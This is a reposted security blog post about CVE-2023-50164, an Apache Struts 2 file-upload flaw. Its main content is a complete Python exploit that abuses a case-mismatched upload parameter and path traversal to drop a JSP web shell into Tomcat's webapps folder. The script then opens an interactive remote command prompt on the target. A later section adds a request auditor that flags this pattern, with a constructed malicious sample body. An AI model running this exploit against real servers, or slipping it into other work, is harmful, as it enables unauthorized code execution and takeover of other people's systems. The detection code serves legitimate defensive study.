CVE-2023-50164-Apache-Struts-RCE

admin, 2023-12-15 08:47:44 · comments · 33 views · 4033 characters · 13 min 26 s read

Introduction

Apache Struts 2 is an open-source Java web application framework intended to help developers build flexible, maintainable and scalable enterprise web applications.
According to the latest advisory, an Apache Struts file upload vulnerability (CVE-2023-50164) has been identified. Analysis shows that, under specific conditions, an attacker can pollute the upload-related request parameters (out-of-bounds values, special characters, and so on) to achieve arbitrary file upload and, from there, arbitrary code execution. Prompt patching is recommended.

Affected versions

Struts 2.0.0 - 2.3.37
Struts 2.5.0 - 2.5.32
Struts 6.0.0 - 6.3.0

Environment setup

See the link below for the lab setup and the analysis walkthrough:

https://xz.aliyun.com/t/13172

PoC

```python
import os
import sys
import time
import string
import random
import argparse
import requests
from urllib.parse import urlparse, urlunparse
from requests_toolbelt import MultipartEncoder
from requests.exceptions import ConnectionError

MAX_ATTEMPTS = 10
DELAY_SECONDS = 1
HTTP_UPLOAD_PARAM_NAME = "upload"
CATALINA_HOME = "/opt/tomcat/"
NAME_OF_WEBSHELL = "webshell"
NAME_OF_WEBSHELL_WAR = NAME_OF_WEBSHELL + ".war"
NUMBER_OF_PARENTS_IN_PATH = 2


def get_base_url(url):
    parsed_url = urlparse(url)
    base_url = urlunparse((parsed_url.scheme, parsed_url.netloc, "", "", "", ""))
    return base_url


def create_war_file():
    if not os.path.exists(NAME_OF_WEBSHELL_WAR):
        os.system("jar -cvf {} {}".format(NAME_OF_WEBSHELL_WAR, NAME_OF_WEBSHELL + '.jsp'))
        print("[+] WAR file created successfully.")
    else:
        print("[+] WAR file already exists.")


def upload_file(url):
    create_war_file()

    if not os.path.exists(NAME_OF_WEBSHELL_WAR):
        print("[-] ERROR: webshell.war not found in the current directory.")
        exit()

    # Relative path from the temporary upload directory into Tomcat's webapps/
    war_location = '../' * (NUMBER_OF_PARENTS_IN_PATH - 1) + '..' + CATALINA_HOME + 'webapps/' + NAME_OF_WEBSHELL_WAR

    war_file_content = open(NAME_OF_WEBSHELL_WAR, "rb").read()

    # The file part is sent with a capitalized name ("Upload") while the
    # lowercase "uploadFileName" parameter supplies the traversal path.
    files = {
        HTTP_UPLOAD_PARAM_NAME.capitalize(): ("arbitrary.txt", war_file_content, "application/octet-stream"),
        HTTP_UPLOAD_PARAM_NAME + "FileName": war_location
    }

    boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))
    m = MultipartEncoder(fields=files, boundary=boundary)
    headers = {"Content-Type": m.content_type}

    try:
        response = requests.post(url, headers=headers, data=m)
        print(f"[+] {NAME_OF_WEBSHELL_WAR} uploaded successfully.")
    except requests.RequestException as e:
        print("[-] Error while uploading the WAR webshell:", e)
        sys.exit(1)


def attempt_connection(url):
    for attempt in range(1, MAX_ATTEMPTS + 1):
        try:
            r = requests.get(url)
            if r.status_code == 200:
                print('[+] Successfully connected to the web shell.')
                return True
            else:
                raise Exception
        except ConnectionError:
            if attempt == MAX_ATTEMPTS:
                print('[-] Maximum attempts reached. Unable to establish a connection with the web shell. Exiting...')
                return False
            time.sleep(DELAY_SECONDS)
        except Exception:
            if attempt == MAX_ATTEMPTS:
                print('[-] Maximum attempts reached. Exiting...')
                return False
            time.sleep(DELAY_SECONDS)
    return False


def start_interactive_shell(url):
    if not attempt_connection(url):
        sys.exit()

    while True:
        try:
            cmd = input("\033[91mCMD\033[0m > ")
            if cmd == 'exit':
                raise KeyboardInterrupt
            r = requests.get(url + "?cmd=" + cmd, verify=False)
            if r.status_code == 200:
                print(r.text.replace('\n\n', ''))
            else:
                raise Exception
        except KeyboardInterrupt:
            sys.exit()
        except ConnectionError:
            print('[-] We lost our connection to the web shell. Exiting...')
            sys.exit()
        except Exception:
            print('[-] Something unexpected happened. Exiting...')
            sys.exit()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit script for CVE-2023-50164 by uploading a webshell to a vulnerable Struts app's server.")
    parser.add_argument("--url", required=True, help="Full URL of the upload endpoint.")
    args = parser.parse_args()

    if not args.url.startswith("http"):
        print("[-] ERROR: Invalid URL. Please provide a valid URL starting with 'http' or 'https'.")
        exit()

    print("[+] Starting exploitation...")
    upload_file(args.url)

    webshell_url = f"{get_base_url(args.url)}/{NAME_OF_WEBSHELL}/{NAME_OF_WEBSHELL}.jsp"
    print(f"[+] Reach the JSP webshell at {webshell_url}?cmd=<COMMAND>")

    print("[+] Attempting a connection with webshell.")
    start_interactive_shell(webshell_url)
```
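As an added defensive example (not part of the original post or of the PoC above), the following Python audits a multipart/form-data request body for the two ingredients the PoC combines: a `*FileName` parameter carrying `..` path segments, and a file part whose name differs from that parameter's base name only by letter case (`Upload` beside `uploadFileName`). The request bodies and boundary are constructed for the example; the field names follow the PoC.

```python
import re

# Matches a ".." path segment, with either slash style, anywhere in the name.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def parse_multipart(body: bytes, boundary: str):
    """Minimal multipart/form-data splitter: returns [(field_name, raw_value)]."""
    delim = b"--" + boundary.encode()
    fields = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, _, payload = chunk.partition(b"\r\n\r\n")
        m = re.search(rb';\s*name="([^"]*)"', head)   # "; name=", not "filename="
        if m:
            fields.append((m.group(1).decode(), payload.rstrip(b"\r\n")))
    return fields

def audit_upload_request(body: bytes, boundary: str):
    """Flag the CVE-2023-50164 request pattern: a *FileName parameter that
    contains '..' segments, and a file part whose name matches that
    parameter's base name only when letter case is ignored."""
    fields = parse_multipart(body, boundary)
    names = [n for n, _ in fields]
    findings = []
    for name, value in fields:
        if not name.endswith("FileName"):
            continue
        base = name[: -len("FileName")]
        text = value.decode("utf-8", "replace")
        if TRAVERSAL.search(text):
            findings.append(f"{name}: traversal in supplied file name {text!r}")
        twins = [n for n in names if n.lower() == base.lower() and n != base]
        if twins:
            findings.append(f"{name}: file part {twins} matches {base!r} only case-insensitively")
    return findings

# Constructed sample request (not captured traffic); mirrors the PoC's field layout.
BOUNDARY = "----WebKitFormBoundaryEXAMPLE000000"
MALICIOUS_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="Upload"; filename="arbitrary.txt"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "PK\x03\x04<constructed archive bytes>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="uploadFileName"\r\n\r\n'
    "../../opt/tomcat/webapps/webshell.war\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()
```

Calling `audit_upload_request(MALICIOUS_BODY, BOUNDARY)` returns two findings for the sample body; a plain upload whose field is named `upload` with no `*FileName` parameter returns none.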

References

https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE
https://xz.aliyun.com/t/13172



Copyright of this article is shared by the author and the WeChat public account platform. It is published for learning and exchange, not for profit; reposting is welcome.

Any direct or indirect consequences or losses arising from the dissemination or use of the information in this article are the sole responsibility of the user; the author accepts no liability. Some of the offensive and defensive techniques in this public account may only be used with the authorization of the target. Most articles come from security communities and personal blogs; if there is any infringement, please contact the public account immediately for removal. If you do not agree with the above notice, please stop reading now!!!

A reminder: Article 285 of the Criminal Law [crime of illegally intruding into computer information systems; crime of illegally obtaining data from or illegally controlling computer information systems]. Whoever, in violation of state regulations, intrudes into computer information systems in the fields of state affairs, national defense construction or cutting-edge science and technology shall be sentenced to fixed-term imprisonment of not more than three years or criminal detention. Whoever, in violation of state regulations, intrudes into computer information systems other than those specified in the preceding paragraph, or uses other technical means to obtain data stored, processed or transmitted in such systems, or illegally controls such systems, shall, if the circumstances are serious, be sentenced to fixed-term imprisonment of not more than three years or criminal detention, with or without a fine; if the circumstances are especially serious, to fixed-term imprisonment of not less than three years but not more than seven years, with a fine.


Originally published on the WeChat public account 巢安实验室: CVE-2023-50164-Apache-Struts-RCE

Reposted by CN-SEC 中文网 (please keep this link when reposting): http://cn-sec.com/archives/2301170.html